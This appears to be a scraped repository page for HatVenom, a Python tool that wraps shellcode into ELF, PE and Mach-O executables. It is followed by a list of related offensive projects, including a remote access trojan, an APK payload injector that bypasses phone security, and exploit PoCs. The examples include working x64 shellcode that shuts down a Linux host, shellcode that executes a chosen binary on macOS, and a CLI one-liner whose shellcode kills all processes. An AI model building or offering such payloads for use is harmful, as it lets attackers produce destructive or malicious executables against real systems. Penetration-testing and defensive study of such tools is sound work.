HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

Overview

HatVenom

HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

Features

  • Support for most common executable formats like elf, macho, pe.
  • Support for most common architectures like x64, x86, aarch64, armle, mipsle, mipsbe.
  • Ability to modify shellcode by changing pre-defined offsets.

Installation

pip3 install git+https://github.com/EntySec/HatVenom

Basic functions

There are all HatVenom basic functions that can be used to generate payload, covert data or inject shellcode.

  • ip_bytes(ip) - Converts IP address to bytes allowed by shellcode.
  • port_bytes(port) - Converts numeric port to bytes allowed by shellcode.
  • string_bytes(string) - Converts string to bytes allowed by shellcode.
  • generate(file_format, arch, shellcode, offsets={}) - Generates payload for specified target and with specified shellcode.
  • generate_to(file_format, arch, shellcode, offsets={}, filename='a.out') - Generates payload for specified target and with specified shellcode and saves it to the specified file.

Generating payload

It's very easy to generate payload for various targets in HatVenom. Let's generate simple payload that calls shutdown for Linux and save it to a.out.

Examples

from hatvenom import HatVenom

shellcode = (
    b"\x48\x31\xc0\x48\x31\xd2\x50\x6a"
    b"\x77\x66\x68\x6e\x6f\x48\x89\xe3"
    b"\x50\x66\x68\x2d\x68\x48\x89\xe1"
    b"\x50\x49\xb8\x2f\x73\x62\x69\x6e"
    b"\x2f\x2f\x2f\x49\xba\x73\x68\x75"
    b"\x74\x64\x6f\x77\x6e\x41\x52\x41"
    b"\x50\x48\x89\xe7\x52\x53\x51\x57"
    b"\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
    b"\x05"
)

hatvenom = HatVenom()
hatvenom.generate_to('elf', 'x64', shellcode)

Payload offsets

Payload offsets is a variables used to add something to shelcode on the preprocessing stage. Offsets looks like this:

\x90\x90\x90\x90:message:string:\x90\x90\x90\x90

Where message is an offset name and string is an offset type. So the basic usage of the offset looks like:

[shellcode]:[name]:[type]:[shellcode]

There are some possible offsets types:

  • string - Plain text that will be converted to bytes on the preprocessing stage.
  • ip - IP address that will be converted to bytes on the preprocessing stage.
  • port - Numeric port that will be converted to bytes on the preprocessing stage.

So if you want to replace offset with bytes instead of string, ip and port, you can use this type:

[shellcode]:[name]:[shellcode]

Examples

Let's generate simple payload that executes provided through file offset file for macOS and save it to a.out.

from hatvenom import HatVenom

shellcode = (
    b"\x48\x31\xf6\x56\x48\xbf"
    b":file:string:"
    b"\x57\x48\x89\xe7\x48\x31"
    b"\xd2\x48\x31\xc0\xb0\x02"
    b"\x48\xc1\xc8\x28\xb0\x3b"
    b"\x0f\x05"
)

hatvenom = HatVenom()
hatvenom.generate_to('macho', 'x64', shellcode, {'file':'//bin/ps'})

HatVenom CLI

HatVenom also has their own command line interface that can be invoked by executing hatvenom command:

usage: hatvenom [-h] [--format FORMAT] [--arch ARCH] [--shellcode SHELLCODE] [--offsets OFFSETS] [-o OUTPUT] [-l]

Powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

optional arguments:
  -h, --help            show this help message and exit
  --format FORMAT       Platform to generate for.
  --arch ARCH           Architecture to generate for.
  --shellcode SHELLCODE
                        Shellcode to inject.
  --offsets OFFSETS     Shellcode offsets.
  -o OUTPUT, --output OUTPUT
                        File to output generated payload.
  -l, --list            List all formats and platforms.

Examples

Let's generate simple payload that kills all processes for Linux and save it to a.out.

hatvenom --format elf --arch x64 --shellcode "\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"

output:

[*] Generating payload...
[i] Final payload size: 131
[*] Saving payload to a.out...
[+] Payload saved to a.out!

NOTE: If you want to use offsets in the CLI version of HatVenom, then you should use --offsets one=1,two=2

You might also like...
对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。
对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。

520_APK_HOOK 介绍 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。 项目地址: https://github.com/cleverbao/520apkhook 作者: BaoGuo 优点 相比于原始的msf远控,此版本ap

proxyshell payload generate

Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

RCE 0-day for GhostScript 9.50 - Payload generator
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic and conditional operations, Ducky Script provides multi-vector functions for all Hak5 payload platforms.

Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

Dumps the payload.bin image found in Android update images.
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework)

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework) Yosh! If you are a django backend develo

Automatic SQL injection and database takeover tool
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

Releases(2.0.0)
Owner
EntySec
EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
EntySec
PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

CVE-2021-45897 PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM = 8.0.1 This vulnerability was repor

Manuel Zametter 17 Nov 09, 2022
Arbitrium is a cross-platform, fully undetectable remote access trojan, to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding rules

About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an

Ayoub 861 Feb 18, 2021
PoC for CVE-2021-26855 -Just a checker-

CVE-2021-26855 PoC for CVE-2021-26855 -Just a checker- Usage python3 CVE-2021-26855.py -u https://mail.example.com -c example.burpcollaborator.net # C

Abdullah AlZahrani 17 Dec 22, 2022
Tools ini digunakan untuk krekk pacebuk:v

E-Crack By Aang-XD Fitur Login • Login via token facebook • Login via cookie facebook Install On Termux $ pkg update && pkg upgrade $ pkg install pyth

Aang Ardiansyah-XD 2 Dec 24, 2021
Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

Cowrie Welcome to the Cowrie GitHub repository This is the official repository for the Cowrie SSH and Telnet Honeypot effort. What is Cowrie Cowrie is

Cowrie 4.1k Jan 09, 2023
Universal Radio Hacker: Investigate Wireless Protocols Like A Boss

The Universal Radio Hacker (URH) is a complete suite for wireless protocol investigation with native support for many common Software Defined Radios.

Dr. Johannes Pohl 9k Jan 03, 2023
A Simple File Encryptor/Decryptor

Ec: A Simple File Encryptor/Decryptor This has been made for educational reasons only, any constructive criticism/advice/comments are welcome! Also, p

1 Dec 10, 2021
大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配)

大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配)

Wolf Group Security Team 835 Jan 05, 2023
S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805 Remote code execution S2-062 (CVE-2021-31805) Due to Apache Struts2's incomplete fix for S2-061 (CVE-2020-17530), some tag attributes c

warin9 31 Nov 22, 2022
Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina=2.2.4. Example Here I

Jina AI 5 Mar 15, 2022
Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers

CVE-2022-21907 - Double Free in http.sys driver Summary An unauthenticated attacker can send an HTTP request with an "Accept-Encoding" HTTP request he

Podalirius 71 Dec 22, 2022
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
Python DNS Lookup: The Domain Name System (DNS) is basically the phonebook of the Internet

-Python-DNS-Lookup- ✨ 🌟 Python DNS Lookup ✨ 🌟 The Domain Name System (DNS) is

Ronnie Atuhaire 2 Feb 14, 2022
Sentinel-1 SAR time series analysis for OSINT use

SARveillance Sentinel-1 SAR time series analysis for OSINT use. Description Generates a time lapse GIF of the Sentinel-1 satellite images for the loca

21 Dec 09, 2022
Mert Güvençli 142 Jan 05, 2023
Separate handling of protected media in Django, with X-Sendfile support

Django Protected Media Django Protected Media is a Django app that manages media that are considered sensitive in a protected fashion. Not only does t

Cobus Carstens 46 Nov 12, 2022
Uncover the full name of a target on Linkedin.

Revealin Uncover the full name of a target on Linkedin. It's just a little PoC exploiting a design flaw. Useful for OSINT. Screenshot Usage $ git clon

mxrch 129 Dec 21, 2022
Virus-Builder - This tool will generate a virus that can only destroy Windows computer

Virus-Builder - This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive

Saad 16 Dec 30, 2022
ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023
The probability of having the password you want in the PassMaker is +90%!!

PasswordMaker Strong listing password Introduction The probability of having the password you want in the tool is +90%!! How to Install Open the termi

MasterBurnt 4 Sep 05, 2021